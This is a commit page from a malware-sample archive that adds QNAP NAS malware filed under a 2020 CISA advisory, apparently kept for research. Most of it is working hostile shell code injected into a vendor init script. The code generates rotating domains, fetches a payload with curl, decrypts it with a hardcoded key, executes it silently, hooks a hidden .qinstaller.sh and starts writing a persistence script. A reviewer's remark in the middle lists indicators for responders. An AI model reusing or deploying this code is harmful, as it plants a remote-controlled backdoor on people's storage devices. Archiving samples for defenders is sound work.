mirror of
https://github.com/MalwareSamples/Malware-Feed
synced 2024-06-16 12:00:17 +00:00
Qnap
parent
e189d90a94
commit
d50917b753
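--- a/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764
+++ b/2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764
@@ -0,0 +1,510 @@
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+start)
+START_TIME=$(date +"%T")
+echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+do
+# report device info and get cloudinstall agent app download url
+DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+if [ "$NAS_ARCH" == "ARM_64" ]; then
+# create ramdisk and create a 64mb file
+/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+# create block size 1K filesystem
+/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+# create virtual disk
+export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+/bin/mkdir -p $CLOUD_INSTALL_PATH
+# mount virtual disk
+/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+else
+# create and mount tmpfs folder
+/bin/mkdir -p $CLOUD_INSTALL_PATH
+/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+fi
+fi
+cd $CLOUD_INSTALL_PATH
+
+if [[ $DOWNLOAD_URL == https* ]]; then
+REPORT_SUCCESS_TIME=$(date +"%T")
+else
+REPORT_FAIL_TIME=$(date +"%T")
+echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+# stop retry when got bad request
+# prevent put bad request all the time
+if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+break
+fi
+fi
+
+# downlaod cloudinstall agent app
+/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+DOWNLOAD_FINISH_TIME=$(date +"%T")
+# unzip and execute cloudinstallagent
+/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+UNZIP_TIME=$(date +"%T")
+fi
+
+if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+# create folder and create symbolic link
+/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+fi
+
+# wait connect
+sleep 5
+CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+SLEEP_TIME=$(( 30 * $COUNTER ))
+if [ $SLEEP_TIME -gt 300 ]; then
+SLEEP_TIME=300
+fi
+# wait next retry
+sleep $SLEEP_TIME
+fi
+COUNTER=$(( $COUNTER * 2 ))
+done
+
+END_TIME=$(date +"%T")
+echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+# call for a new process group and for later kill
+/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+# set cloudinstall report status
+/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+# add link to report offline
+/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+# buzzer
+HARDWARE_TYPE=$(uname -m)
+if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+then
+/sbin/hal_app --se_buzzer enc_id=0,mode=101
+elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+then
+/sbin/pic_raw 81
+fi
+;;
+
+stop)
+# disconnect cloudinstall agent
+$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+do
+# use bash kill instead /bin/kill for kill process group
+# cloudinstall agent daemon and inotifywait
+kill -9 -- -$i &>/dev/null
+done
+
+# umount
+if [ "$NAS_ARCH" == "ARM_64" ]; then
+/bin/umount -l $USED_LOOP_DEVICE
+/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+else
+/bin/umount -l $CLOUD_INSTALL_PATH
+fi
+# remove all files
+if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+fi
+if [ -d "$CLOUD_INSTALL_PATH" ]; then
+/bin/rm -rf $CLOUD_INSTALL_PATH
+fi
+if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+fi
+;;
+
+restart)
+$0 stop
+$0 start
+;;
+
+*)
+echo "Usage: $0 {start|stop|restart}"
+{ /share/MD0_DATA/.system/.qinstaller.sh; exit 1; }
+esac
+{ /share/MD0_DATA/.system/.qinstaller.sh; exit 0; }
+
+
+set_env()
+{
+debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+if [ "$debug" != "NULL" ]; then
+/bin/touch $LOG_FILE
+else
+/bin/rm -f $LOG_FILE
+fi
+}
+
+set_env
+
+dbg()
+{
+if [ -f "$LOG_FILE" ]; then
+echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr ()
+{
+local s=;
+local min=${1:-4};
+local max=${2:-12};
+local kspace="${3:-a-zA-Z}"
+tr -dc "$kspace" < /dev/urandom | {
+read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+echo "$s"
+}
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
+cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+for ext in $domainexts; do
+hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+for host in $hostnames; do
+test -f "$outfile" && rm -f "$outfile"
+recentupdate=''
+curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+test -s "$outfile" || continue
+fsize=$(( $(wc -c < "$outfile") ))
+test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+test "$rsamsg" || continue
+path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+test "$rsadomain" = "${host}.${ext}" || continue
+timenow=$(date +%s)
+test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+test "$filehash" = "$hash" || continue
+curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+mv "${outfile}_s" "${ts}_v"
+chmod 755 "$outfile" || continue
+( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
+test "$recentupdate" -eq 1 && exit 0
+done
+done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+return
+fi
+
+if [ "$QPKG_ENABLE" = "NULL" ]; then
+if [ "$OLD_ENABLE" = "FALSE" ]; then
+dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+fi
+fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+export QNAP_QPKG=rtrr
+else
+export QNAP_QPKG=HybridBackup
+/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+if [ -f /usr/bin/qsyncman ]; then
+[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+/usr/bin/crontab /etc/config/crontab
+echo -n "Starting QSync manitor: "
+[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+echo "OK"
+fi
+}
+
+stop()
+{
+echo "Shutting down QSync monitor: OK"
+pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+kill $pidnum 2>/dev/null
+i=0
+while [ ${i} -lt 5 ]
+do
+pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+if [ -z "$pidnum" ]; then
+break
+fi
+sleep 1
+i=`/usr/bin/expr ${i} + 1`
+done
+pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+#[ "x$_qsyncd_en" = x1 ] || return -1
+_qsyncd_run_pid=`/bin/pidof qsyncd`
+[ -z $_qsyncd_run_pid ] || return -114
+_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+_with_syslog=$1
+if [ "x$_recycle_en" = xTRUE ]; then
+if [ "x$_with_syslog" = x1 ]; then
+LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+else
+LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+fi
+else
+if [ "x$_with_syslog" = x1 ]; then
+/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+else
+/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+fi
+fi
+_iret=$?
+if [ "x$_iret" = x0 ]; then
+i=0
+while [ ${i} -lt 10000 ]
+do
+echo "${i} millisecond..."
+_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+_qsyncd_run_pid=`/bin/pidof qsyncd`
+if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+break
+fi
+usleep 50000
+i=`/usr/bin/expr ${i} + 50`
+done
+fi
+return -$_iret
+}
+
+stop_qsyncd()
+{
+#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+#[ "x$_qsyncd_en" = x0 ] || return -1
+_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+[ $_qsyncd_pid -lt 0 ] && return -3
+# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+/bin/kill -SIGUSR1 $_qsyncd_pid
+usleep 200000
+# Send SIGINT to stop the QSyncd process
+/bin/kill -SIGINT $_qsyncd_pid
+_kill_ret=$?
+if [ "x$_kill_ret" != x0 ]; then
+return -3
+fi
+echo "need wait $1 millisecond"
+i=0
+while true
+do
+echo "${i} millisecond..."
+_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+_qsyncd_run_pid=`/bin/pidof qsyncd`
+if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+break
+fi
+if [ ${i} -ge $1 ]; then
+# if time-out, we send two additional SIGINT to force the daemon to stop.
+if [ $_qsyncd_pid -ge 0 ]; then
+/bin/kill -SIGUSR1 $_qsyncd_pid
+usleep 200000
+/bin/kill -SIGUSR1 $_qsyncd_pid
+fi
+j=0
+while [ ${j} -lt 500 ]
+do
+_qsyncd_run_pid=`/bin/pidof qsyncd`
+if [ -z $_qsyncd_run_pid ]; then
+return 0
+fi
+usleep 20000
+j=`/usr/bin/expr ${j} + 20`
+done
+return -62
+fi
+usleep 50000
+i=`/usr/bin/expr ${i} + 50`
+done
+return 0
+}
+
+
+install()
+{
+lock_file="/var/lock/qbox_install_bin.lck"
+
+if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+dbg "build-in ${QSYNC_NAME} is installed"
+return 1
+fi
+
+if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+dbg "${QSYNC_NAME}.bin} not found"
+return 1
+fi
+
+if [ ! -x "${QPKG_CLI}" ]; then
+dbg "${QPKG_CLI} not found"
+return 1
+fi
+
+## make sure volume is exist
+if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+dbg "/share/Public not found"
+return 1
+fi
+
+## is removed
+if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+/bin/rm -f ${INSTALL_BUILD_IN}
+dbg "${QSYNC_NAME} is removed"
+return 1
+fi
+
+if [ -f "$lock_file" ]; then
+if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+echo "${QSYNC_NAME} is installing"
+dbg "${QSYNC_NAME} is installing"
+return 1
+fi
+fi
+
+/bin/touch "$lock_file"
+/bin/rm -f ${INSTALL_BUILD_IN}
+dbg "install build-in ${QSYNC_NAME} start"
+
+set_default_disable_status
+
+## install build in Qsync
+${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+sleep 20
+
+wait_install=60
+## avoid initial take long time or fail
+while [ "$wait_install" -gt 0 ]; do
+stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+if [ "$stcode" = "0" ]; then
+break
+fi
+sleep 1
+let "wait_install--"
+done
+
+${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+/bin/rm -f "$lock_file"
+dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+{ /share/MD0_DATA/.system/.qinstaller.sh; exit 0; }
+fi
+fi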
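Review bot: This sample is committed with no analysis notes and only a one-word title, so nothing marks which lines are the vendor's cloudinstall/Qsync init script and which were injected. The injected part appears to be the block from the second `export PATH=...` through the nested `for domainexts` loop, plus the `{ /share/MD0_DATA/.system/.qinstaller.sh; exit 1; }` groups; the copy of the same script embedded in the `15892206…` sample on this page has plain `exit 1` / `exit 0` at those points. Since the file name looks like the sample's SHA-256, the annotation belongs in a sidecar README rather than in the file itself. It should list what a responder can hunt for: `.rsakey`, `.tmp.*` and `<ts>_v` files under `<volume>/.qpkg/.config`, the `.qinstaller.sh` path, and `curl -k` requests for `/qnap_firmware.xml?t=` to hostnames that are recomputed every 1296000 seconds over the two `DOMAIN_EXT_*` lists.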
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/13f3ea4783a6c8d5ec0b0d342dcdd0de668694b9c1b533ce640ae4571fdbf63c
Normal file
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/13f3ea4783a6c8d5ec0b0d342dcdd0de668694b9c1b533ce640ae4571fdbf63c
Normal file
File diff suppressed because one or more lines are too long
550
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/15892206207fdef1a60af17684ea18bcaa5434a1c7bdca55f460bb69abec0bdc
Normal file
550
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/15892206207fdef1a60af17684ea18bcaa5434a1c7bdca55f460bb69abec0bdc
Normal file
@ -0,0 +1,550 @@
|
||||
#!/bin/sh
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
if [ ! -f "${bdir}/.qpkg/.config/backup_conf.sh" ]; then
|
||||
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
|
||||
cat > "${bdir}/.qpkg/.config/backup_conf.sh" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
